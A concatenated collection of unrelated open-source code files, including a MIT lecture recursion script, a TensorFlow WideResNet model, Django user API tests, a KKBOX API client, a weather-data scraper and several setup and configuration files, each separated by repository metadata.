""",
# CARD + CARD + SUBS
"""
ph:phrase rela=NA
w1:word pdp=subs ls=card
<: word pdp=subs ls=card
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# CARD + W + CARD + SUBS
"""
ph:phrase rela=NA
w1:word pdp=subs ls=card
<: word lex=W
<: word pdp=subs ls=card
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# ~Cardinal quantifier phrases
"""
phrase rela=NA
/where/
word
/have/
pdp=subs prs=absent
/-/
word ls=card
word pdp=subs ls#card
""",
]
| 2.3125
| 2
|
src/lect06.py
|
luchenhua/MIT-OCW-600
| 0
|
12777700
|
__author__ = 'luchenhua'
EtoF = {'bread': 'du pain', 'wine': 'du vin', 'eats': 'mange', 'drinks': 'bois', 'likes': 'aime', 1: 'un',
'6.00': '6.00'}
print(EtoF)
print(EtoF.keys())
print(EtoF.keys)
del EtoF[1]
print(EtoF)
def translateWord(word, dictionary):
if word in dictionary:
return dictionary[word]
else:
return word
def translate(sentence):
translation = ''
word = ''
for e in sentence:
if e != ' ':
word = word + e
else:
translation = translation + ' ' + translateWord(word, EtoF)
word = ''
return translation[1:] + ' ' + translateWord(word, EtoF)
print(translate('John eats bread'))
print(translate('Steve drinks wine'))
print(translate('John likes 6.00'))
def simpleExp(b, n):
if n == 0:
return 1
else:
return b * simpleExp(b, n - 1)
print(simpleExp(2, 10))
def tower(n, f, t, s):
if n == 1:
print('Move from ' + f + ' to ' + t)
else:
tower(n - 1, f, s, t)
tower(1, f, t, s)
tower(n - 1, s, t, f)
print(tower(5, 'a', 'b', 'c'))
def toChars(s):
import string
s = string.lower(s)
ans = ''
for c in s:
if c in string.lowercase:
ans = ans + c
return ans
def isPal(s):
if len(s) <= 1:
return True
else:
return s[0] == s[-1] and isPal(s[1: -1])
def isPalindraw(s):
return isPal(toChars(s))
print(isPalindraw('Guttag'))
def isPalPrint(s, indent):
if len(s) <= 1:
print(indent + 'current: ' + s)
return True
else:
print(indent + 'current: ' + s)
return s[0] == s[-1] and isPalPrint(s[1: -1], (indent + ' '))
def isPalindrawPrint(s):
return isPalPrint(toChars(s), ' ')
print(isPalindrawPrint('Guttag'))
def fib(x):
assert type(x) == int and x >= 0
if x == 0 or x == 1:
return 1
else:
return fib(x - 1) + fib(x - 2)
print(fib(2))
print(fib(3))
print(fib(4))
print(fib(5))
| 3.875
| 4
|
WideResNet.py
|
Stick-To/Deep_Conv_Backone_tensorflow
| 12
|
12777701
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
class WideResNet:
def __init__(self, nk, input_shape, num_classes, weight_decay, keep_prob, data_format='channels_last'):
assert len(nk) == 2
assert (nk[0] - 1) % 3 == 0
self.N = (nk[0] - 1) // 3
self.k = nk[1]
self.input_shape = input_shape
self.num_classes = num_classes
self.weight_decay = weight_decay
self.prob = 1. - keep_prob
assert data_format in ['channels_first', 'channels_last']
self.data_format = data_format
self.global_step = tf.train.get_or_create_global_step()
self.is_training = True
self._define_inputs()
self._build_graph()
self._init_session()
def _define_inputs(self):
shape = [None]
shape.extend(self.input_shape)
self.images = tf.placeholder(dtype=tf.float32, shape=shape, name='images')
self.labels = tf.placeholder(dtype=tf.int32, shape=[None, self.num_classes], name='labels')
self.lr = tf.placeholder(dtype=tf.float32, shape=[], name='lr')
def _build_graph(self):
with tf.variable_scope('before_split'):
conv1 = self._conv_bn_activation(
bottom=self.images,
filters=16,
kernel_size=3,
strides=1,
)
with tf.variable_scope('split'):
residual_block = conv1
for i in range(self.N):
residual_block = self._residual_block(residual_block, 16*self.k, 1, 'group_conv2/conv'+str(i+1))
for i in range(self.N):
residual_block = self._residual_block(residual_block, 32*self.k, 2, 'group_conv3/conv'+str(i+1))
for i in range(self.N):
residual_block = self._residual_block(residual_block, 64*self.k, 2, 'group_conv4/conv'+str(i+1))
with tf.variable_scope('after_spliting'):
bn = self._bn(residual_block)
relu = tf.nn.relu(bn)
with tf.variable_scope('group_avg_pool'):
axes = [1, 2] if self.data_format == 'channels_last' else [2, 3]
global_pool = tf.reduce_mean(relu, axis=axes, keepdims=False, name='global_pool')
final_dense = tf.layers.dense(global_pool, self.num_classes, name='final_dense')
with tf.variable_scope('optimizer'):
self.logit = tf.nn.softmax(final_dense, name='logit')
self.classifer_loss = tf.losses.softmax_cross_entropy(self.labels, final_dense, label_smoothing=0.1, reduction=tf.losses.Reduction.MEAN)
self.l2_loss = self.weight_decay * tf.add_n(
[tf.nn.l2_loss(var) for var in tf.trainable_variables()]
)
total_loss = self.classifer_loss + self.l2_loss
lossavg = tf.train.ExponentialMovingAverage(0.9, name='loss_moveavg')
lossavg_op = lossavg.apply([total_loss])
with tf.control_dependencies([lossavg_op]):
self.total_loss = tf.identity(total_loss)
var_list = tf.trainable_variables()
varavg = tf.train.ExponentialMovingAverage(0.9, name='var_moveavg')
varavg_op = varavg.apply(var_list)
optimizer = tf.train.MomentumOptimizer(self.lr, momentum=0.9)
train_op = optimizer.minimize(self.total_loss, global_step=self.global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
self.train_op = tf.group([update_ops, lossavg_op, varavg_op, train_op])
self.accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(final_dense, 1), tf.argmax(self.labels, 1)), tf.float32), name='accuracy'
)
def _init_session(self):
self.sess = tf.InteractiveSession()
self.sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver()
self.best_saver = tf.train.Saver()
def train_one_batch(self, images, labels, lr, sess=None):
self.is_training = True
if sess is None:
sess_ = self.sess
else:
sess_ = sess
_, loss, acc = sess_.run([self.train_op, self.total_loss, self.accuracy],
feed_dict={
self.images: images,
self.labels: labels,
self.lr: lr
})
return loss, acc
def validate_one_batch(self, images, labels, sess=None):
self.is_training = False
if sess is None:
sess_ = self.sess
else:
sess_ = sess
logit, acc = sess_.run([self.logit, self.accuracy], feed_dict={
self.images: images,
self.labels: labels,
self.lr: 0.
})
return logit, acc
def test_one_batch(self, images, sess=None):
self.is_training = False
if sess is None:
sess_ = self.sess
else:
sess_ = sess
logit = sess_.run([self.logit], feed_dict={
self.images: images,
self.lr: 0.
})
return logit
def save_weight(self, mode, path, sess=None):
assert(mode in ['latest', 'best'])
if sess is None:
sess_ = self.sess
else:
sess_ = sess
saver = self.saver if mode == 'latest' else self.best_saver
saver.save(sess_, path, global_step=self.global_step)
print('save', mode, 'model in', path, 'successfully')
def load_weight(self, mode, path, sess=None):
assert(mode in ['latest', 'best'])
if sess is None:
sess_ = self.sess
else:
sess_ = sess
saver = self.saver if mode == 'latest' else self.best_saver
ckpt = tf.train.get_checkpoint_state(path)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess_, path)
print('load', mode, 'model in', path, 'successfully')
else:
raise FileNotFoundError('Not Found Model File!')
def _bn(self, bottom):
bn = tf.layers.batch_normalization(
inputs=bottom,
axis=3 if self.data_format == 'channels_last' else 1,
training=self.is_training
)
return bn
def _conv_bn_activation(self, bottom, filters, kernel_size, strides, activation=tf.nn.relu):
conv = tf.layers.conv2d(
inputs=bottom,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same',
data_format=self.data_format,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer()
)
bn = self._bn(conv)
if activation is not None:
return activation(bn)
else:
return bn
def _bn_activation_conv(self, bottom, filters, kernel_size, strides, activation=tf.nn.relu):
bn = self._bn(bottom)
if activation is not None:
bn = activation(bn)
conv = tf.layers.conv2d(
inputs=bn,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same',
data_format=self.data_format,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer()
)
return conv
def _residual_block(self, bottom, filters, strides, scope):
with tf.variable_scope(scope):
with tf.variable_scope('conv_branch'):
conv = self._bn_activation_conv(bottom, filters, 3, strides)
dropout = self._dropout(conv, 'dropout')
conv = self._bn_activation_conv(dropout, filters, 3, 1)
with tf.variable_scope('identity_branch'):
if strides != 1:
shutcut = self._bn_activation_conv(bottom, filters, 1, strides)
else:
index = 3 if self.data_format == 'channels_last' else 1
if tf.shape(bottom)[index] != filters:
shutcut = self._bn_activation_conv(bottom, filters, 1, strides)
else:
shutcut = bottom
return conv + shutcut
def _max_pooling(self, bottom, pool_size, strides, name):
return tf.layers.max_pooling2d(
inputs=bottom,
pool_size=pool_size,
strides=strides,
padding='same',
data_format=self.data_format,
name=name
)
def _avg_pooling(self, bottom, pool_size, strides, name):
return tf.layers.average_pooling2d(
inputs=bottom,
pool_size=pool_size,
strides=strides,
padding='same',
data_format=self.data_format,
name=name
)
def _dropout(self, bottom, name):
return tf.layers.dropout(
inputs=bottom,
rate=self.prob,
training=self.is_training,
name=name
)
| 2.34375
| 2
|
setup.py
|
ops-utils/fresh-slack
| 1
|
12777702
|
# Not currently used; in case I ever turn this into a formal package
import setuptools
with open('README.md', 'r') as f:
long_description = f.read()
with open('requirements.txt') as f:
install_requires = f.read().split('\n')
install_requires = [x for x in install_requires if x != '']
setuptools.setup(
name = 'fresh-slack',
version = '0.1.0',
author = ['<NAME>'],
author_email = ['<EMAIL>'],
description = 'Like destalinator, but active',
long_description = long_description,
url = 'https://github.com/anyutils/fresh-slack',
packages = setuptools.find_packages(),
python_requires = '>= 3.6.*',
install_requires = install_requires,
extras_require = {
'dev': [
'pytest >= 5.4.3',
'pytest-cov >= 2.10.0',
'coverage >= 5.2',
'mypy >= 0.782'
]
},
classifiers = [
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
'License :: MIT'
],
entry_points = {
'console_scripts': [
'freshen-slack = fresh_slack.main:main'
]
},
include_package_data = True
)
| 1.484375
| 1
|
kkbox_developer_sdk/feature_playlist_fetcher.py
|
garyckhsu/django-REST
| 71
|
12777703
|
#!/usr/bin/env python
# encoding: utf-8
from .fetcher import *
from .territory import *
class KKBOXFeaturePlaylistFetcher(Fetcher):
'''
List all featured playlists metadata.
See `https://docs-en.kkbox.codes/v1.1/reference#featured-playlists`.
'''
@assert_access_token
def fetch_all_feature_playlists(self, terr=KKBOXTerritory.TAIWAN):
'''
Fetches featured playlists.
:param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists'
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
@assert_access_token
def fetch_feature_playlist(self, playlist_id, terr=KKBOXTerritory.TAIWAN):
'''
Fetches featured playlists.
:param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists-playlist_id`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists/%s' % playlist_id
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
@assert_access_token
def fetch_feature_playlist_tracks(self, playlist_id, terr=KKBOXTerritory.TAIWAN):
'''
Fetches featured playlists.
:param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists-playlist_id-tracks`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists/%s/tracks' % playlist_id
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
| 2.4375
| 2
|
Python_Basics/Programming_in_Python/operators_and_operands.py
|
samyumobi/A-Complete-Python-Guide-For-Beginners
| 7
|
12777704
|
<reponame>samyumobi/A-Complete-Python-Guide-For-Beginners<filename>Python_Basics/Programming_in_Python/operators_and_operands.py<gh_stars>1-10
print(100 + 200) # addition
print(5 - 2) # subtraction
print(3 * 10) # multiplication
print(10 / 3) # division
print(10 // 3) # integer division
print(10 % 3) # modulo
print(4**2) # expontation
print(10 + 20 / 2)
print((10 + 20) / 2)
| 3.78125
| 4
|
Gal2Renpy/DefineSyntax/MovieDefine.py
|
dtysky/Gal2Renpy
| 36
|
12777705
|
#coding:utf-8
#################################
#Copyright(c) 2014 dtysky
#################################
import G2R,os
class MovieDefine(G2R.DefineSyntax):
def Creat(self,Flag,US,FS,DictHash):
DictHash=G2R.DefineSyntax.Creat(self,Flag,US,FS,DictHash)
if DictHash[Flag]==G2R.DHash(US.Args[Flag]):
return DictHash
path=US.Args['pathmode']['ScriptPath']+'define/movie.rpy'
elepath=US.Args['pathmode']['MoviePath']
Args=US.Args[Flag]
so=''
for ele in Args:
if Args[ele]=='StopMoive':
continue
so+='define movie_'+os.path.splitext(Args[ele])[0]+' = '
so+="'"+elepath+Args[ele]+"'\n"
FS.Open(path,'w')
FS.Write(so)
FS.Close()
return DictHash
| 2.46875
| 2
|
Mod 01/04-2-List.py
|
SauloCav/CN
| 0
|
12777706
|
<filename>Mod 01/04-2-List.py<gh_stars>0
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
def f(x):
return x**3 -x -1
def phi(x):
return (x+1)**(1/3)
x = 1.5
while f(x+10**-4)*f(x-10**-4)>= 0:
x = phi(x)
print(x)
| 3.5
| 4
|
setup.py
|
TheDataShed/geograpy3
| 0
|
12777707
|
from setuptools import setup
import os
from collections import OrderedDict
try:
long_description = ""
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
except:
print('Curr dir:', os.getcwd())
long_description = open('../../README.md').read()
setup(name='geograpy3',
version='0.1.24',
description='Extract countries, regions and cities from a URL or text',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/somnathrakshit/geograpy3',
download_url='https://github.com/somnathrakshit/geograpy3',
author='<NAME>',
author_email='<EMAIL>',
license='Apache',
project_urls=OrderedDict(
(
("Documentation", "https://geograpy3.netlify.app"),
("Code", "https://github.com/somnathrakshit/geograpy3"),
("Issue tracker", "https://github.com/somnathrakshit/geograpy3/issues"),
)
),
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
packages=['geograpy'],
install_requires=[
'numpy',
'nltk',
'newspaper3k',
'jellyfish',
'pycountry',
'pylodstorage'
],
scripts=['geograpy/bin/geograpy-nltk'],
package_data={
'geograpy': ['data/*.csv'],
},
zip_safe=False)
| 1.75
| 2
|
starlite/logging.py
|
madlad33/starlite
| 0
|
12777708
|
from logging import config
from typing import Any, Dict, List, Optional, Union
from pydantic import BaseModel
from typing_extensions import Literal
class LoggingConfig(BaseModel):
version: Literal[1] = 1
incremental: bool = False
disable_existing_loggers: bool = False
filters: Optional[Dict[str, Dict[str, Any]]] = None
formatters: Dict[str, Dict[str, Any]] = {
"standard": {"format": "%(levelname)s - %(asctime)s - %(name)s - %(module)s - %(message)s"}
}
handlers: Dict[str, Dict[str, Any]] = {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"queue_listener": {"class": "starlite.QueueListenerHandler", "handlers": ["cfg://handlers.console"]},
}
loggers: Dict[str, Dict[str, Any]] = {
"starlite": {
"level": "INFO",
"handlers": ["queue_listener"],
},
}
root: Dict[str, Union[Dict[str, Any], List[Any], str]] = {"handlers": ["console"], "level": "WARNING"}
def configure(self) -> None:
"""Configure logging by converting 'self' to dict and passing it to logging.config.dictConfig"""
config.dictConfig(self.dict(exclude_none=True))
| 2.25
| 2
|
app/user/tests/test_user_api.py
|
ClickTravel-VincentCleaver/recipe-app-api
| 0
|
12777709
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
"""Test the users API (public)"""
# ------------------------------------------------------
# CREATE USER tests
# ------------------------------------------------------
def setUp(self):
self.client = APIClient()
def test_create_user_success(self):
"""Test that create user with valid payload is successful"""
# Given
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a success response status is returned
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# Then the password is stored for the user
user = get_user_model().objects.get(**response.data)
self.assertTrue(user.check_password(payload['password']))
# Then the password is not returned in the response
self.assertNotIn('password', response.data)
def test_create_duplicate_user_fails(self):
"""Test creating a user that already exists fails"""
# Given a user that already exists
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
create_user(**payload)
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a bad request status is returned
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_user_with_password_too_short(self):
"""Test creating a user with a password
that is not more than 5 characters"""
# Given a create user request with a too-short password
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a bad request status is returned
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the user is not created
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
# ------------------------------------------------------
# TOKEN tests
# ------------------------------------------------------
def test_create_token_for_user(self):
"""Test that a token is created for the user"""
# Given
payload = {'email': '<EMAIL>', 'password': '<PASSWORD>'}
create_user(**payload)
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then the response contains a token
self.assertIn('token', response.data)
def test_create_token_invalid_credentials(self):
"""Test that token is not created for invalid credentials"""
# Given
create_user(email='<EMAIL>', password='<PASSWORD>')
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
def test_create_token_no_user(self):
"""Test that token is not created for non-existent user"""
# Given
payload = {'email': '<EMAIL>', 'password': '<PASSWORD>'}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
def test_create_token_missing_password(self):
"""Test that email and password are required"""
# Given
create_user(email='<EMAIL>', password='<PASSWORD>')
payload = {'email': '<EMAIL>', 'password': ''}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
# ------------------------------------------------------
# ME tests
# ------------------------------------------------------
def test_get_me_unauthorised(self):
"""Test that authentication is required for users"""
# Given no authentication token
# When
response = self.client.get(ME_URL)
# Then
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
"""Test API requests that require authentication"""
def setUp(self):
self.user = create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='MOCK_NAME'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_get_me_success(self):
"""Test get me for authenticated user"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data,
{
'name': self.user.name,
'email': self.user.email
},
)
def test_post_me_not_allowed(self):
"""Test that POST is not allowed on me URL"""
# Given / When
response = self.client.post(ME_URL, {})
# Then
self.assertEqual(
response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_me_success(self):
"""Test updating the user profile for authenticated user"""
# Given
payload = {
'name': 'MOCK_NEW_NAME',
'password': '<PASSWORD>',
}
# When
response = self.client.patch(ME_URL, payload)
# Then request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then user is updated
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
| 2.84375
| 3
|
daily.py
|
filiptronicek/czech-weather
| 1
|
12777710
|
from pyowm import OWM
import csv
from datetime import datetime
from os import environ, stat, path, access, R_OK, mkdir
API_key = environ.get('API_key')
if API_key is None:
from creds import API_key
fields = ["date", "windspeed", "humidity", "temperature", "status"]
now = datetime.now()
cities = ["Praha", "Plzen", "<NAME>", "<NAME>", "Usti nad Labem", "Liberec", "<NAME>", "Pardubice", "Jihlava", "Brno", "Olomouc", "Zlin", "Ostrava"]
for city in cities:
foldername = "data/"
filename = foldername + city.lower()+".csv"
if not path.isdir(foldername):
mkdir(foldername)
if not path.isfile(filename) and not access(filename, R_OK):
pf = open(filename, "w")
if stat(filename).st_size == 0:
WriteData = open(filename, "a")
WriteData.write("time, windspeed, humidity, temperature, pressure, rain, snow, clouds, status \n")
WriteData.close()
def getWeatherInfo(city: str):
owm = OWM(API_key)
mgr = owm.weather_manager()
obs = mgr.weather_at_place(city+',CZ')
w = obs.weather
# Weather details
wind = w.wind()
humidity = w.humidity
temp = w.temperature('celsius')
status = w.status.lower()
pressure = w.pressure
rain = w.rain
snow = w.snow
clouds = w.clouds
def checkFor(objct):
if len(objct) == 0:
return 0
else:
return objct
return [now.strftime("%Y.%m.%d"), wind['speed'], humidity, temp['temp'], pressure['press'], checkFor(rain), checkFor(snow), clouds, status]
def createString(csvArr):
fnlStr = ""
for i,el in enumerate(csvArr):
fnlStr += str(el)
if i != len(csvArr) - 1:
fnlStr += ","
else:
fnlStr += "\n"
return fnlStr
for city in cities:
filename = "data/"+city.lower()+".csv"
csvArrIn = getWeatherInfo(city)
WriteData = open(filename, "a")
WriteData.write(createString(csvArrIn))
WriteData.close()
| 2.78125
| 3
|
engine/admin.py
|
lordoftheflies/gargantula-scrapersite
| 0
|
12777711
|
<reponame>lordoftheflies/gargantula-scrapersite<filename>engine/admin.py
from django.contrib import admin
from django.contrib.admin import ModelAdmin
from django.utils.translation import gettext as _
from . import models
# Register your models here.
class ArgumentInline(admin.TabularInline):
model = models.ArgumentModel
verbose_name_plural = _('Parameters')
fk_name = 'process'
fields = ['slug', 'friendly_name', 'description', 'data_type', 'default_value', 'tag']
extra = 0
class PropertyInline(admin.TabularInline):
model = models.ArgumentModel
verbose_name_plural = _('Properties')
fk_name = 'process'
fields = ['slug', 'friendly_name', 'description', 'data_type', 'default_value', 'tag']
extra = 0
@admin.register(models.ProcessModel)
class ProcessAdmin(ModelAdmin):
fields = ['friendly_name', 'description', 'notebook']
list_display = ['id', 'friendly_name', 'notebook_basename', 'description']
icon = '<i class="material-icons">attachment</i>'
inlines = [
ArgumentInline,
PropertyInline
]
| 1.992188
| 2
|
models/GenericModel.py
|
marioviti/nn_segmentation
| 0
|
12777712
|
from serialize import save_to, load_from
from keras.models import Model
class GenericModel(object):
def __init__( self, inputs, outputs, loss, metrics, optimizer, loss_weights=None, sample_weight_mode=None):
"""
params:
inputs: (tuple)
outputs: (tuple)
loss: (function) Optimization strategy.
metrics: (tuple)
optimizer: (optimizer)
"""
self.model = Model(inputs=inputs, outputs=outputs)
self.inputs_shape = [ input._keras_shape[1:] for input in inputs ]
self.outputs_shape = [ output._keras_shape[1:] for output in outputs ]
self.loss= loss
self.metrics = metrics
self.optimizer = optimizer
self.loss_weights = loss_weights
self.sample_weight_mode = sample_weight_mode
self.compile()
def compile(self):
if not self.sample_weight_mode is None:
self.model.compile( optimizer=self.optimizer,
sample_weight_mode=self.sample_weight_mode,
loss=self.loss, metrics=self.metrics )
elif not self.loss_weights is None:
self.model.compile( optimizer=self.optimizer,
loss_weights=self.loss_weights,
loss=self.loss, metrics=self.metrics )
else:
self.model.compile( optimizer=self.optimizer,
loss=self.loss, metrics=self.metrics )
def save_model(self, name=None):
self.name = self.name if name is None else name
save_to( self.model,self.name )
def load_model(self, name=None):
self.name = self.name if name is None else name
self.model = load_from( self.name )
self.compile()
def fit( self, x_train, y_train, batch_size=1, epochs=1, cropped=False, **kwargs ):
return self.model.fit( x_train, y_train, \
epochs=epochs, batch_size=batch_size, **kwargs)
def evaluate( self, x_test, y_test, batch_size=1, cropped=False ):
return self.model.evaluate(x_test, y_test, batch_size=batch_size )
def predict( self, x, batch_size=1, verbose=0 ):
return self.model.predict( x, batch_size=batch_size, verbose=verbose )
| 2.578125
| 3
|
old_files/Parsing_justifications_dev_skdclean.py
|
jmhernan/NIreland_NLP
| 1
|
12777713
|
################################################################
#### This is code for using regular expressions to clean / ####
#### parse text from Nvivo .txt into a workable format. ####
#### <NAME>9 ####
#### <NAME> Sarah ####
#### environment: ni_nlp ####
################################################################
## Activate environment
Condo activate ni_nlp
## cd into project
cd OneDrive/Incubator/NIreland_NLP/
## Launch: python OR jupyter notebook
## Import python programs ##
import pandas as pd
import re
import os
## Load txt document
test_file = "/Users/sarahdreier/OneDrive/Incubator/NIreland_NLP/just_0106/J_Denial.txt"
f = open(test_file, "r")
text = f.read()
f.close()
## View txt file
text
## Split into unique string for each document (r signals regular expression)
test = re.split(r'.*(?=Files)', text)
## Examine output
test[2]
len(test) #120 lines, line 0 is blank
## Filter out blank lines
test2 = list(filter(None,test))
len(test2) #118 documents have the “denial” code - this is the same as in Nvivo
## Puts the list into a dataframe and name the raw text as its only column
prelim_df = pd.DataFrame(test2,columns=["raw_text"])
prelim_df.head
## Extracts image ID as a unique column
prelim_df["image_id"] = prelim_df["raw_text"].str.extract(r"(IMG_\d{4})")
prelim_df.head
## Extracts file ID as a unique column
prelim_df["file_id"] = prelim_df["raw_text"].str.extract(r"(DEFE\w+|PREM\w+|CJ\w+)")
prelim_df.head
## Fixing File/Image number issue (PREM 15 478, 1010, 1689).
# Note: 1010/1689 and 487 have overlapping image numbers (1010/1689: IMGs 001-205; 487: IMGs 001-258)
# This will be a problem later if we use IMG as a unique identifier
prelim_df["image_id2"] = prelim_df["file_id"].str.extract(r"(PREM_15_.*_\S*)")
prelim_df["image_id2"] = r"IMG_0" + prelim_df["image_id2"].str.extract(r"(\d{3}$)")
prelim_df["image_id"] = prelim_df["image_id"].fillna(prelim_df["image_id2"])
## Extracts justification text as its own raw-text column (Removes “Reference”)
prelim_df["just_text_lump"] = prelim_df["raw_text"].str.replace(r"(?<!Files)(.*)(?<=Coverage)", "").str.strip()
prelim_df["just_text_lump"].head
prelim_df["just_text_lump2"] = prelim_df["just_text_lump"].str.replace(r"\W+", " ") # This removes all non-letter characters, including \n spaces and punctuation.
## Extracts justification text as its own raw-text column (Retains “Reference” markers which can be used to split each unique code).
prelim_df["just_text"] = prelim_df["raw_text"].str.replace(r"(?<!Files)(.*)(?<=Coverage])", "").str.strip()
prelim_df["just_text"].head
## Extract the number of unique codes in this justification category a given document received
prelim_df["reference_count"] = prelim_df["raw_text"].str.extract(r"(\d\sreference)")
## Write out as a csv
prelim_df.to_csv("prelim_denial.csv")
## Text work to create a new variable for each unique reference
#re.compile(r"^>(\w+)$$([.$]+)^$", re.MULTILINE) #
#(Reference.\d)(.*)(?<=Reference.[2-5])
#prelim_df["test"] = prelim_df["raw_text"].str.extract(r"(Reference)(.*)(Files)", re.MULTILINE)
##################
## To set different rules for output
#pd.set_option('display.max_rows', 10)
#pd.set_option('display.max_rows', None)
## See number of references / codes per document — THIS DOESN’T WORK
#prelim_df["code_quantity"] = prelim_df["raw_text"].str.extract(r”(\d{2}references)")
| 3.234375
| 3
|
yt/frontends/art/api.py
|
danielgrassinger/yt_new_frontend
| 0
|
12777714
|
<filename>yt/frontends/art/api.py<gh_stars>0
"""
API for yt.frontends.art
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from .data_structures import \
ARTDomainFile,\
ARTDomainSubset,\
ARTIndex,\
ARTDataset
from .fields import \
ARTFieldInfo
from .io import \
IOHandlerART
from . import tests
| 1.296875
| 1
|
single-use-scripts/generate-mod-eng-prose-genre-labels.py
|
timgianitsos/english-universal_feature_analysis
| 0
|
12777715
|
<filename>single-use-scripts/generate-mod-eng-prose-genre-labels.py<gh_stars>0
'''
Generate the csv of genre labels for files
'''
import os
from os.path import join, dirname
import csv
def main():
verse_dir = ('english-diachronic-corpus', 'Modern_English', 'Verse_Corpus')
prose_dir = ('english-diachronic-corpus', 'Modern_English', 'Plaintext_prose_corpus')
prose_genre_label_file = (
'english-diachronic-corpus', 'Modern_English', 'MdE_prose_metadata.csv',
)
'''
There are many categories with only a few texts within each. We will merge categories that are similar.
Original category counts:
Counter({
'EDUC_TREATISE': 24,'LETTERS_PRIV': 22,'HISTORY': 21,'TRAVELOGUE': 21,'FICTION': 21,
'DRAMA_COMEDY': 21,'DIARY_PRIV': 21,'HANDBOOK_OTHER': 21,'SERMON': 19,'SCIENCE_OTHER': 15,
'PROCEEDINGS_TRIAL': 10,'BIOGRAPHY_AUTO': 10,'BIBLE': 10,'LETTERS_NON-PRIV': 10,
'BIOGRAPHY_OTHER': 9,'SCIENCE_MEDICINE': 9,'LAW': 7,'PHILOSOPHY': 4,
})
MERGE: BIBLE, SERMON -> religious
MERGE: SCIENCE_OTHER, SCIENCE_MEDICINE -> science
MERGE: PROCEEDINGS_TRIAL, LAW -> law
MERGE: BIOGRAPHY_AUTO, BIOGRAPHY_OTHER -> biography
MERGE: LETTERS_PRIV, LETTERS_NON-PRIV -> letters
MERGE: HANDBOOK_OTHER, EDUC_TREATISE -> educ_treatise
MERGE: PHILOSOPHY, RELIGIOUS -> religious
Merged category counts:
Counter({
'educ_treatise': 45,'history': 21,'travelogue': 21,'fiction': 21,'drama_comedy': 21,
'diary_priv': 21,'science': 24,'biography': 19,'religious': 33,'letters': 32,'law': 17,
})
'''
found_label_to_merge_label = {
'BIBLE': 'religious',
'SERMON': 'religious',
'SCIENCE_OTHER': 'science',
'SCIENCE_MEDICINE': 'science',
'PROCEEDINGS_TRIAL': 'law',
'LAW': 'law',
